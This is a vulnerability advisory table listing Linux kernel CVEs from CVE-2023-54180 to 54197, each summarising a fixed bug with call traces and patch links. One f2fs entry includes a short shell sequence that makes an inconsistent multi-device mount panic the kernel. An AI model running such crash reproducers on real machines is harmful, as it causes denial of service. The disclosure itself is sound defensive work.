| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: handle case when repair happens with dev-replace [BUG] There is a bug report that a BUG_ON() in btrfs_repair_io_failure() (originally repair_io_failure() in v6.0 kernel) got triggered when replacing an unreliable disk: BTRFS warning (device sda1): csum failed root 257 ino 2397453 off 39624704 csum 0xb0d18c75 expected csum 0x4dae9c5e mirror 3 kernel BUG at fs/btrfs/extent_io.c:2380! invalid opcode: 0000 [#1] PREEMPT SMP NOPTI CPU: 9 PID: 3614331 Comm: kworker/u257:2 Tainted: G OE 6.0.0-5-amd64 #1 Debian 6.0.10-2 Hardware name: Micro-Star International Co., Ltd. MS-7C60/TRX40 PRO WIFI (MS-7C60), BIOS 2.70 07/01/2021 Workqueue: btrfs-endio btrfs_end_bio_work [btrfs] RIP: 0010:repair_io_failure+0x24a/0x260 [btrfs] Call Trace: <TASK> clean_io_failure+0x14d/0x180 [btrfs] end_bio_extent_readpage+0x412/0x6e0 [btrfs] ? __switch_to+0x106/0x420 process_one_work+0x1c7/0x380 worker_thread+0x4d/0x380 ? rescuer_thread+0x3a0/0x3a0 kthread+0xe9/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x22/0x30 [CAUSE] Before the BUG_ON(), we got some read errors from the replace target first; note the mirror number (3, which is beyond RAID1 duplication, thus it's read from the replace target device). Then at the BUG_ON() location, we are trying to write the repaired sectors back to the failed device. The check looks like this: ret = btrfs_map_block(fs_info, BTRFS_MAP_WRITE, logical, &map_length, &bioc, mirror_num); if (ret) goto out_counter_dec; BUG_ON(mirror_num != bioc->mirror_num); But inside btrfs_map_block(), we can modify bioc->mirror_num, especially for dev-replace: if (dev_replace_is_ongoing && mirror_num == map->num_stripes + 1 && !need_full_stripe(op) && dev_replace->tgtdev != NULL) { ret = get_extra_mirror_from_replace(fs_info, logical, *length, dev_replace->srcdev->devid, &mirror_num, &physical_to_patch_in_first_stripe); patch_the_first_stripe_for_dev_replace = 1; } Thus if we're repairing the replace target device, we're going to trigger that BUG_ON(). But in reality, the read failure from the replace target device may be because our replace hasn't reached the range we're reading, thus we're reading garbage, but with replace running, the range would be properly filled later. Thus in that case, we don't need to do anything but let the replace routine handle it. [FIX] Instead of a BUG_ON(), just skip the repair if we're repairing the device replace target device. | 2025-12-30 | not yet calculated | CVE-2023-54180 | https://git.kernel.org/stable/c/a7018b40b49c37fb55736499f790ec0d2b381ae4 https://git.kernel.org/stable/c/53e9d6851b56626885476a2966194ba994f8bb4b https://git.kernel.org/stable/c/d73a27b86fc722c28a26ec64002e3a7dc86d1c07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix issue in verifying allow_ptr_leaks After we converted the capabilities of our networking-bpf program from cap_sys_admin to cap_net_admin+cap_bpf, our networking-bpf program failed to start. Because it failed the bpf verifier, and the error log is "R3 pointer comparison prohibited". A simple reproducer as follows, SEC("cls-ingress") int ingress(struct __sk_buff *skb) { struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr); if ((long)(iph + 1) > (long)skb->data_end) return TC_ACT_STOLEN; return TC_ACT_OK; } Per discussion with Yonghong and Alexei [1], comparison of two packet pointers is not a pointer leak. This patch fixes it. Our local kernel is 6.1.y and we expect this fix to be backported to 6.1.y, so stable is CCed. [1]. https://lore.kernel.org/bpf/CAADnVQ+Nmspr7Si+pxWn8zkE7hX-7s93ugwC+94aXSy4uQ9vBg@mail.gmail.com/ | 2025-12-30 | not yet calculated | CVE-2023-54181 | https://git.kernel.org/stable/c/c96c67991aac6401b4c6996093bccb704bb2ea4b https://git.kernel.org/stable/c/5927f0172d2809d8fc09c1ba667280b0387e9f73 https://git.kernel.org/stable/c/acfdc8b77016c8e648aadc283177546c88083dd3 https://git.kernel.org/stable/c/d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to check readonly condition correctly With the below case, it can mount a multi-device image w/ rw option, however one of the secondary devices is set as ro, and a later update will cause a panic, so let's introduce f2fs_dev_is_readonly(), and check multi-device rw status in f2fs_remount() w/ it in order to avoid such an inconsistent mount status. mkfs.f2fs -c /dev/zram1 /dev/zram0 -f blockdev --setro /dev/zram1 mount -t f2fs dev/zram0 /mnt/f2fs mount: /mnt/f2fs: WARNING: source write-protected, mounted read-only. mount -t f2fs -o remount,rw mnt/f2fs dd if=/dev/zero of=/mnt/f2fs/file bs=1M count=8192 kernel BUG at fs/f2fs/inline.c:258! RIP: 0010:f2fs_write_inline_data+0x23e/0x2d0 [f2fs] Call Trace: f2fs_write_single_data_page+0x26b/0x9f0 [f2fs] f2fs_write_cache_pages+0x389/0xa60 [f2fs] __f2fs_write_data_pages+0x26b/0x2d0 [f2fs] f2fs_write_data_pages+0x2e/0x40 [f2fs] do_writepages+0xd3/0x1b0 __writeback_single_inode+0x5b/0x420 writeback_sb_inodes+0x236/0x5a0 __writeback_inodes_wb+0x56/0xf0 wb_writeback+0x2a3/0x490 wb_do_writeback+0x2b2/0x330 wb_workfn+0x6a/0x260 process_one_work+0x270/0x5e0 worker_thread+0x52/0x3e0 kthread+0xf4/0x120 ret_from_fork+0x29/0x50 | 2025-12-30 | not yet calculated | CVE-2023-54182 | https://git.kernel.org/stable/c/e2759a59a4cc96af712084e9db7065c858c4fe9f https://git.kernel.org/stable/c/e05d63f8b48aad4613bd582c945bee41e2dd7255 https://git.kernel.org/stable/c/da8c535b28696017e5d1532d12ea78e836432d9e https://git.kernel.org/stable/c/d78dfefcde9d311284434560d69c0478c55a657e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: v4l2-core: Fix a potential resource leak in v4l2_fwnode_parse_link() If fwnode_graph_get_remote_endpoint() fails, 'fwnode' is known to be NULL, so fwnode_handle_put() is a no-op. Release the reference taken from a previous fwnode_graph_get_port_parent() call instead. Also handle fwnode_graph_get_port_parent() failures. In order to fix these issues, add an error handling path to the function and the needed gotos. | 2025-12-30 | not yet calculated | CVE-2023-54183 | https://git.kernel.org/stable/c/2342942331e1f034ff58f293e10d0d9b7581601f https://git.kernel.org/stable/c/4bc5ffaf8ac4f3e7a1fcd10a0a0e7b022b694877 https://git.kernel.org/stable/c/d8a8f75fce049bdb3144b607deefe51e996b9660 https://git.kernel.org/stable/c/caf058833b6f3fe7beabf738110f79bb987c8fff https://git.kernel.org/stable/c/25afb3e03bf8ab02567af4b6ffbfd6250a91a9f8 https://git.kernel.org/stable/c/ed1696f7f92e8404940d51dec80a123aa18163a8 https://git.kernel.org/stable/c/e8a1cd87bb9fa3149ee112ecb8058908dc9b520e https://git.kernel.org/stable/c/d7b13edd4cb4bfa335b6008ab867ac28582d3e5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: iscsit: Free cmds before session free Commands from recovery entries are freed after the session has been closed. That leads to a use-after-free at command free or an NPE with such a call trace: Time2Retain timer expired for SID: 1, cleaning up iSCSI session. BUG: kernel NULL pointer dereference, address: 0000000000000140 RIP: 0010:sbitmap_queue_clear+0x3a/0xa0 Call Trace: target_release_cmd_kref+0xd1/0x1f0 [target_core_mod] transport_generic_free_cmd+0xd1/0x180 [target_core_mod] iscsit_free_cmd+0x53/0xd0 [iscsi_target_mod] iscsit_free_connection_recovery_entries+0x29d/0x320 [iscsi_target_mod] iscsit_close_session+0x13a/0x140 [iscsi_target_mod] iscsit_check_post_dataout+0x440/0x440 [iscsi_target_mod] call_timer_fn+0x24/0x140 Move cleanup of recovery entries to before session freeing. | 2025-12-30 | not yet calculated | CVE-2023-54184 | https://git.kernel.org/stable/c/89f5055f9b0b57c7e7f02e32df95ef401f809b71 https://git.kernel.org/stable/c/4621e24c9257c6379343bf0c11b473817cf7edcd https://git.kernel.org/stable/c/1911cca5916b6e106de7afa3ec0a38447158216c https://git.kernel.org/stable/c/a7a4def6c7046e090bb10c6d550fdeb487db98ba https://git.kernel.org/stable/c/4ce221d295f53e6c6b835ab33181e735482c9aac https://git.kernel.org/stable/c/d8990b5a4d065f38f35d69bcd627ec5a7f8330ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: remove BUG_ON()'s in add_new_free_space() At add_new_free_space() we have these BUG_ON()'s that are there to deal with any failure to add free space to the in memory free space cache. Such failures are mostly -ENOMEM that should be very rare. However there's no need to have these BUG_ON()'s, we can just return any error to the caller and all callers and their upper call chain are already dealing with errors. So just make add_new_free_space() return any errors, while removing the BUG_ON()'s, and returning the total amount of added free space to an optional u64 pointer argument. | 2025-12-30 | not yet calculated | CVE-2023-54185 | https://git.kernel.org/stable/c/23e72231f8281505883514b23709076e234d4f27 https://git.kernel.org/stable/c/f775ceb0cb530e4a469b718fb2a24843071087f5 https://git.kernel.org/stable/c/d8ccbd21918fd7fa6ce3226cffc22c444228e8ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: altmodes/displayport: fix pin_assignment_show This patch fixes negative indexing of buf array in pin_assignment_show when get_current_pin_assignments returns 0 i.e. no compatible pin assignments are found. BUG: KASAN: use-after-free in pin_assignment_show+0x26c/0x33c ... Call trace: dump_backtrace+0x110/0x204 dump_stack_lvl+0x84/0xbc print_report+0x358/0x974 kasan_report+0x9c/0xfc __do_kernel_fault+0xd4/0x2d4 do_bad_area+0x48/0x168 do_tag_check_fault+0x24/0x38 do_mem_abort+0x6c/0x14c el1_abort+0x44/0x68 el1h_64_sync_handler+0x64/0xa4 el1h_64_sync+0x78/0x7c pin_assignment_show+0x26c/0x33c dev_attr_show+0x50/0xc0 | 2025-12-30 | not yet calculated | CVE-2023-54186 | https://git.kernel.org/stable/c/0e61a7432fcd4bca06f05b7f1c7d7cb461880fe2 https://git.kernel.org/stable/c/4f9c0a7c272626cb6716ffc7800e8c73260cdce6 https://git.kernel.org/stable/c/ff466f77d0a56719979c4234abd412abd98eae8f https://git.kernel.org/stable/c/fc0e18f95c88435bd8a1ceb540243cd7fbcd9781 https://git.kernel.org/stable/c/08bd1be1c716fd50a7df48f82dcbc59a103082b5 https://git.kernel.org/stable/c/54ee23e4ab263a495ace1eed43d3883212ece17f https://git.kernel.org/stable/c/d8f28269dd4bf9b55c3fb376ae31512730a96fce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix potential corruption when moving a directory F2FS has the same issue in ext4_rename causing crash revealed by xfstests/generic/707. See also commit 0813299c586b ("ext4: Fix possible corruption when moving a directory") | 2025-12-30 | not yet calculated | CVE-2023-54187 | https://git.kernel.org/stable/c/3e77036246123ff710fa2661dcaa12a45284f09b https://git.kernel.org/stable/c/957904f531fd857a92743b11fbc9c9ffdf7f3207 https://git.kernel.org/stable/c/8f57f3e112cf1d16682b6ff9c31c72f40f7da9c9 https://git.kernel.org/stable/c/8a0b544b7caedfbc05065b6377fd1d8bf7ef5e70 https://git.kernel.org/stable/c/f20191100952013f0916418cdaed0ab55c7b634c https://git.kernel.org/stable/c/0a76082a4a32a90d1ef33dee8b400efc082b4b6f https://git.kernel.org/stable/c/d94772154e524b329a168678836745d2773a6e02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: apple-admac: Fix 'current_tx' not getting freed In terminate_all we should queue up all submitted descriptors to be freed. We do that for the content of the 'issued' and 'submitted' lists, but the 'current_tx' descriptor falls through the cracks as it's removed from the 'issued' list once it gets assigned to be the current descriptor. Explicitly queue up freeing of the 'current_tx' descriptor to address a memory leak that is otherwise present. | 2025-12-30 | not yet calculated | CVE-2023-54188 | https://git.kernel.org/stable/c/b7abd535881a48587961c2099b1d2933ebd42c4b https://git.kernel.org/stable/c/fd4d88e68c75caf5c6f8293a36bc3ae289e0369e https://git.kernel.org/stable/c/d9503be5a100c553731c0e8a82c7b4201e8a970c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore/ram: Add check for kstrdup Add check for the return value of kstrdup() and return the error if it fails in order to avoid NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54189 | https://git.kernel.org/stable/c/8430a8e8e85420d4cb51dcb08b0278ab194ea82f https://git.kernel.org/stable/c/a14cb307267ba7a1715403e071bdc4deda77eef5 https://git.kernel.org/stable/c/38a9d7dac3ad25323145b4aaea3b5f434f50011d https://git.kernel.org/stable/c/f57ba91a46d3fc52bfdac9cca5cf5572ec7afd6d https://git.kernel.org/stable/c/2a764a2facd9dd88a69777200f65dfd0182765dc https://git.kernel.org/stable/c/065c81ae5817b245bb9feb6d54e027702740b49a https://git.kernel.org/stable/c/d97038d5ec2062733c1e016caf9baaf68cf64ea1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: leds: led-core: Fix refcount leak in of_led_get() class_find_device_by_of_node() calls class_find_device(), which takes a reference; use put_device() to drop the reference when it is no longer needed. | 2025-12-30 | not yet calculated | CVE-2023-54190 | https://git.kernel.org/stable/c/1d6101d9222e1ca8c01b3fa9ebf0dcf7bcd82564 https://git.kernel.org/stable/c/690efcb5827c3bacbf1de90cd14907b91bf8cb7b https://git.kernel.org/stable/c/d880981b82223f9bf128dfdd2424abb0c658f345 https://git.kernel.org/stable/c/ddf3e82164afd9381b1d52c9f00b3878f7b6d308 https://git.kernel.org/stable/c/da1afe8e6099980fe1e2fd7436dca284af9d3f29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7996: fix memory leak in mt7996_mcu_exit Always purge mcu skb queues in mt7996_mcu_exit routine even if mt7996_firmware_state fails. | 2025-12-30 | not yet calculated | CVE-2023-54191 | https://git.kernel.org/stable/c/b539d35e13e5d6b3dca76271261106b2356aa64c https://git.kernel.org/stable/c/da5b4d93e141b52c5a71d0c41a042d1bcaf70d2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix null pointer panic in tracepoint in __replace_atomic_write_block We got a kernel panic if old_addr is NULL. https://bugzilla.kernel.org/show_bug.cgi?id=217266 BUG: kernel NULL pointer dereference, address: 0000000000000000 Call Trace: <TASK> f2fs_commit_atomic_write+0x619/0x990 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43] __f2fs_ioctl+0xd8e/0x4080 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43] ? vfs_write+0x2ae/0x3f0 ? vfs_write+0x2ae/0x3f0 __x64_sys_ioctl+0x91/0xd0 do_syscall_64+0x5c/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc RIP: 0033:0x7f69095fe53f | 2025-12-30 | not yet calculated | CVE-2023-54192 | https://git.kernel.org/stable/c/424f8cdc0ad29e4940be96dcc0b935ba497adeda https://git.kernel.org/stable/c/1424358cd66c49460493293497b54cb72e0213cc https://git.kernel.org/stable/c/e2bbefc1741cb0732c13652be173da02f25611d1 https://git.kernel.org/stable/c/da6ea0b050fa720302b56fbb59307e7c7531a342 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: cls_api: remove block_cb from driver_list before freeing Error handler of tcf_block_bind() frees the whole bo->cb_list on error. However, by that time the flow_block_cb instances are already in the driver list because driver ndo_setup_tc() callback is called before that up the call chain in tcf_block_offload_cmd(). This leaves dangling pointers to freed objects in the list and causes use-after-free[0]. Fix it by also removing flow_block_cb instances from driver_list before deallocating them. [0]: [ 279.868433] ================================================================== [ 279.869964] BUG: KASAN: slab-use-after-free in flow_block_cb_setup_simple+0x631/0x7c0 [ 279.871527] Read of size 8 at addr ffff888147e2bf20 by task tc/2963 [ 279.873151] CPU: 6 PID: 2963 Comm: tc Not tainted 6.3.0-rc6+ #4 [ 279.874273] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 279.876295] Call Trace: [ 279.876882] <TASK> [ 279.877413] dump_stack_lvl+0x33/0x50 [ 279.878198] print_report+0xc2/0x610 [ 279.878987] ? flow_block_cb_setup_simple+0x631/0x7c0 [ 279.879994] kasan_report+0xae/0xe0 [ 279.880750] ? flow_block_cb_setup_simple+0x631/0x7c0 [ 279.881744] ? mlx5e_tc_reoffload_flows_work+0x240/0x240 [mlx5_core] [ 279.883047] flow_block_cb_setup_simple+0x631/0x7c0 [ 279.884027] tcf_block_offload_cmd.isra.0+0x189/0x2d0 [ 279.885037] ? tcf_block_setup+0x6b0/0x6b0 [ 279.885901] ? mutex_lock+0x7d/0xd0 [ 279.886669] ? __mutex_unlock_slowpath.constprop.0+0x2d0/0x2d0 [ 279.887844] ? ingress_init+0x1c0/0x1c0 [sch_ingress] [ 279.888846] tcf_block_get_ext+0x61c/0x1200 [ 279.889711] ingress_init+0x112/0x1c0 [sch_ingress] [ 279.890682] ? clsact_init+0x2b0/0x2b0 [sch_ingress] [ 279.891701] qdisc_create+0x401/0xea0 [ 279.892485] ? qdisc_tree_reduce_backlog+0x470/0x470 [ 279.893473] tc_modify_qdisc+0x6f7/0x16d0 [ 279.894344] ? tc_get_qdisc+0xac0/0xac0 [ 279.895213] ? mutex_lock+0x7d/0xd0 [ 279.896005] ? __mutex_lock_slowpath+0x10/0x10 [ 279.896910] rtnetlink_rcv_msg+0x5fe/0x9d0 [ 279.897770] ? rtnl_calcit.isra.0+0x2b0/0x2b0 [ 279.898672] ? __sys_sendmsg+0xb5/0x140 [ 279.899494] ? do_syscall_64+0x3d/0x90 [ 279.900302] ? entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 279.901337] ? kasan_save_stack+0x2e/0x40 [ 279.902177] ? kasan_save_stack+0x1e/0x40 [ 279.903058] ? kasan_set_track+0x21/0x30 [ 279.903913] ? kasan_save_free_info+0x2a/0x40 [ 279.904836] ? ____kasan_slab_free+0x11a/0x1b0 [ 279.905741] ? kmem_cache_free+0x179/0x400 [ 279.906599] netlink_rcv_skb+0x12c/0x360 [ 279.907450] ? rtnl_calcit.isra.0+0x2b0/0x2b0 [ 279.908360] ? netlink_ack+0x1550/0x1550 [ 279.909192] ? rhashtable_walk_peek+0x170/0x170 [ 279.910135] ? kmem_cache_alloc_node+0x1af/0x390 [ 279.911086] ? _copy_from_iter+0x3d6/0xc70 [ 279.912031] netlink_unicast+0x553/0x790 [ 279.912864] ? netlink_attachskb+0x6a0/0x6a0 [ 279.913763] ? netlink_recvmsg+0x416/0xb50 [ 279.914627] netlink_sendmsg+0x7a1/0xcb0 [ 279.915473] ? netlink_unicast+0x790/0x790 [ 279.916334] ? iovec_from_user.part.0+0x4d/0x220 [ 279.917293] ? netlink_unicast+0x790/0x790 [ 279.918159] sock_sendmsg+0xc5/0x190 [ 279.918938] ____sys_sendmsg+0x535/0x6b0 [ 279.919813] ? import_iovec+0x7/0x10 [ 279.920601] ? kernel_sendmsg+0x30/0x30 [ 279.921423] ? __copy_msghdr+0x3c0/0x3c0 [ 279.922254] ? import_iovec+0x7/0x10 [ 279.923041] ___sys_sendmsg+0xeb/0x170 [ 279.923854] ? copy_msghdr_from_user+0x110/0x110 [ 279.924797] ? ___sys_recvmsg+0xd9/0x130 [ 279.925630] ? __perf_event_task_sched_in+0x183/0x470 [ 279.926656] ? ___sys_sendmsg+0x170/0x170 [ 279.927529] ? ctx_sched_in+0x530/0x530 [ 279.928369] ? update_curr+0x283/0x4f0 [ 279.929185] ? perf_event_update_userpage+0x570/0x570 [ 279.930201] ? __fget_light+0x57/0x520 [ 279.931023] ? __switch_to+0x53d/0xe70 [ 27 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54193 | https://git.kernel.org/stable/c/cc5fe387c6294d0471cb7ed064efac97fac65ccc https://git.kernel.org/stable/c/7311c8be3755611bf6edea4dfbeb190b4bdd489f https://git.kernel.org/stable/c/cb145932fcf6814e7e95e467eb70e7849a845ae9 https://git.kernel.org/stable/c/55866fe3fded3ce94ac3fc1bb3dfce654282f483 https://git.kernel.org/stable/c/26aec72429a05e917d574eca0efc5306c63a8862 https://git.kernel.org/stable/c/7b7a74ed303d532fb73ae4b1697f16a0fea89cd0 https://git.kernel.org/stable/c/da94a7781fc3c92e7df7832bc2746f4d39bc624e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: use kvmalloc_array/kvfree instead of kmalloc_array/kfree The call stack shown below is a scenario in the Linux 4.19 kernel. Allocating memory failed where exfat fs uses kmalloc_array due to system memory fragmentation, while the u-disk was inserted without recognition. Devices such as u-disks using the exfat file system are pluggable and may be inserted into the system at any time. However, long-term running systems cannot guarantee the continuity of physical memory. Therefore, it's necessary to address this issue. Binder:2632_6: page allocation failure: order:4, mode:0x6040c0(GFP_KERNEL|__GFP_COMP), nodemask=(null) Call trace: [242178.097582] dump_backtrace+0x0/0x4 [242178.097589] dump_stack+0xf4/0x134 [242178.097598] warn_alloc+0xd8/0x144 [242178.097603] __alloc_pages_nodemask+0x1364/0x1384 [242178.097608] kmalloc_order+0x2c/0x510 [242178.097612] kmalloc_order_trace+0x40/0x16c [242178.097618] __kmalloc+0x360/0x408 [242178.097624] load_alloc_bitmap+0x160/0x284 [242178.097628] exfat_fill_super+0xa3c/0xe7c [242178.097635] mount_bdev+0x2e8/0x3a0 [242178.097638] exfat_fs_mount+0x40/0x50 [242178.097643] mount_fs+0x138/0x2e8 [242178.097649] vfs_kern_mount+0x90/0x270 [242178.097655] do_mount+0x798/0x173c [242178.097659] ksys_mount+0x114/0x1ac [242178.097665] __arm64_sys_mount+0x24/0x34 [242178.097671] el0_svc_common+0xb8/0x1b8 [242178.097676] el0_svc_handler+0x74/0x90 [242178.097681] el0_svc+0x8/0x340 By analyzing the exfat code, we found that continuous physical memory is not required here, so using kvmalloc_array can solve this problem. | 2025-12-30 | not yet calculated | CVE-2023-54194 | https://git.kernel.org/stable/c/79d16a84ea41272dfcb0c00f9798ddd0edd8098d https://git.kernel.org/stable/c/8a34a242cf03211cc89f68308d149b793f63c479 https://git.kernel.org/stable/c/1427a7e96fb90d0896f74f5bcd21feb03cc7c3d0 https://git.kernel.org/stable/c/0c5c3e8a2550b6b2a304b45f260296db9c09df96 https://git.kernel.org/stable/c/daf60d6cca26e50d65dac374db92e58de745ad26 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix timeout of a call that hasn't yet been granted a channel afs_make_call() calls rxrpc_kernel_begin_call() to begin a call (which may get stalled in the background waiting for a connection to become available); it then calls rxrpc_kernel_set_max_life() to set the timeouts - but that starts the call timer so the call timer might then expire before we get a connection assigned - leading to the following oops if the call stalled: BUG: kernel NULL pointer dereference, address: 0000000000000000 ... CPU: 1 PID: 5111 Comm: krxrpcio/0 Not tainted 6.3.0-rc7-build3+ #701 RIP: 0010:rxrpc_alloc_txbuf+0xc0/0x157 ... Call Trace: <TASK> rxrpc_send_ACK+0x50/0x13b rxrpc_input_call_event+0x16a/0x67d rxrpc_io_thread+0x1b6/0x45f ? _raw_spin_unlock_irqrestore+0x1f/0x35 ? rxrpc_input_packet+0x519/0x519 kthread+0xe7/0xef ? kthread_complete_and_exit+0x1b/0x1b ret_from_fork+0x22/0x30 Fix this by noting the timeouts in struct rxrpc_call when the call is created. The timer will be started when the first packet is transmitted. It shouldn't be possible to trigger this directly from userspace through AF_RXRPC as sendmsg() will return EBUSY if the call is in the waiting-for-conn state if it dropped out of the wait due to a signal. | 2025-12-30 | not yet calculated | CVE-2023-54195 | https://git.kernel.org/stable/c/92128a7170a220b5126d09a1c1954a3a8d46cef3 https://git.kernel.org/stable/c/72f4a9f3f447948cf86dffe1c4a4c8a429ab9666 https://git.kernel.org/stable/c/db099c625b13a74d462521a46d98a8ce5b53af5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix NULL pointer dereference in 'ni_write_inode' Syzbot found the following issue: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000016 Mem abort info: ESR = 0x0000000096000006 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x06: level 2 translation fault Data abort info: ISV = 0, ISS = 0x00000006 CM = 0, WnR = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=000000010af56000 [0000000000000016] pgd=08000001090da003, p4d=08000001090da003, pud=08000001090ce003, pmd=0000000000000000 Internal error: Oops: 0000000096000006 [#1] PREEMPT SMP Modules linked in: CPU: 1 PID: 3036 Comm: syz-executor206 Not tainted 6.0.0-rc6-syzkaller-17739-g16c9f284e746 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/26/2022 pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : is_rec_inuse fs/ntfs3/ntfs.h:313 [inline] pc : ni_write_inode+0xac/0x798 fs/ntfs3/frecord.c:3232 lr : ni_write_inode+0xa0/0x798 fs/ntfs3/frecord.c:3226 sp : ffff8000126c3800 x29: ffff8000126c3860 x28: 0000000000000000 x27: ffff0000c8b02000 x26: ffff0000c7502320 x25: ffff0000c7502288 x24: 0000000000000000 x23: ffff80000cbec91c x22: ffff0000c8b03000 x21: ffff0000c8b02000 x20: 0000000000000001 x19: ffff0000c75024d8 x18: 00000000000000c0 x17: ffff80000dd1b198 x16: ffff80000db59158 x15: ffff0000c4b6b500 x14: 00000000000000b8 x13: 0000000000000000 x12: ffff0000c4b6b500 x11: ff80800008be1b60 x10: 0000000000000000 x9 : ffff0000c4b6b500 x8 : 0000000000000000 x7 : ffff800008be1b50 x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000000008 x1 : 0000000000000001 x0 : 0000000000000000 Call trace: is_rec_inuse fs/ntfs3/ntfs.h:313 [inline] ni_write_inode+0xac/0x798 fs/ntfs3/frecord.c:3232 ntfs_evict_inode+0x54/0x84 fs/ntfs3/inode.c:1744 evict+0xec/0x334 fs/inode.c:665 iput_final fs/inode.c:1748 [inline] iput+0x2c4/0x324 fs/inode.c:1774 ntfs_new_inode+0x7c/0xe0 fs/ntfs3/fsntfs.c:1660 ntfs_create_inode+0x20c/0xe78 fs/ntfs3/inode.c:1278 ntfs_create+0x54/0x74 fs/ntfs3/namei.c:100 lookup_open fs/namei.c:3413 [inline] open_last_lookups fs/namei.c:3481 [inline] path_openat+0x804/0x11c4 fs/namei.c:3688 do_filp_open+0xdc/0x1b8 fs/namei.c:3718 do_sys_openat2+0xb8/0x22c fs/open.c:1311 do_sys_open fs/open.c:1327 [inline] __do_sys_openat fs/open.c:1343 [inline] __se_sys_openat fs/open.c:1338 [inline] __arm64_sys_openat+0xb0/0xe0 fs/open.c:1338 __invoke_syscall arch/arm64/kernel/syscall.c:38 [inline] invoke_syscall arch/arm64/kernel/syscall.c:52 [inline] el0_svc_common+0x138/0x220 arch/arm64/kernel/syscall.c:142 do_el0_svc+0x48/0x164 arch/arm64/kernel/syscall.c:206 el0_svc+0x58/0x150 arch/arm64/kernel/entry-common.c:636 el0t_64_sync_handler+0x84/0xf0 arch/arm64/kernel/entry-common.c:654 el0t_64_sync+0x18c/0x190 Code: 97dafee4 340001b4 f9401328 2a1f03e0 (79402d14) ---[ end trace 0000000000000000 ]--- The above issue may happen as follows: ntfs_new_inode mi_init mi->mrec = kmalloc(sbi->record_size, GFP_NOFS); -->failed to allocate memory if (!mi->mrec) return -ENOMEM; iput iput_final evict ntfs_evict_inode ni_write_inode is_rec_inuse(ni->mi.mrec)-> As 'ni->mi.mrec' is NULL trigger NULL-ptr-deref To solve the above issue, if new inode allocation failed, make the inode bad before calling 'iput()' in 'ntfs_new_inode()'. | 2025-12-30 | not yet calculated | CVE-2023-54196 | https://git.kernel.org/stable/c/6d3d3283e6b4fb3f3ee05dac30ee1461930b8103 https://git.kernel.org/stable/c/329fc4d3f73d865b25f2ee4eafafb040ace37ad5 https://git.kernel.org/stable/c/1c5cffe0d662fb2de7b63176c2582abb69b5f538 https://git.kernel.org/stable/c/db2a3cc6a3481076da6344cc62a80a4e2525f36f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "Bluetooth: btsdio: fix use after free bug in btsdio_remove due to unfinished work" This reverts commit 1e9ac114c4428fdb7ff4635b45d4f46017e8916f. This patch introduces a possible null-ptr-def problem. Revert it. And the fixed bug by this patch have resolved by commit 73f7b171b7c0 ("Bluetooth: btsdio: fix use after free bug in btsdio_remove due to race condition"). | 2025-12-30 | not yet calculated | CVE-2023-54197 | https://git.kernel.org/stable/c/3b4ed52009723f7dfca7a8ca95163bfb441bfb76 https://git.kernel.org/stable/c/70a104588e3131415e559c06deb834ce259a285a https://git.kernel.org/stable/c/de0ffb5145c9f418ad76f00e58d4b91c680410b2 https://git.kernel.org/stable/c/0837d10f6c37a47a0c73bccf1e39513613a2fcc2 https://git.kernel.org/stable/c/a789192f366147a0fbb395650079906d1d04e0b9 https://git.kernel.org/stable/c/952030c914b5f2288609efe868537afcff7a3f51 https://git.kernel.org/stable/c/8f83fa62614c282dd5d1211a0dd99c6a0a515b81 https://git.kernel.org/stable/c/d8d7ce037d9a8f1f0714ece268c4c2c50845bbc3 https://git.kernel.org/stable/c/db2bf510bd5d57f064d9e1db395ed86a08320c54 |
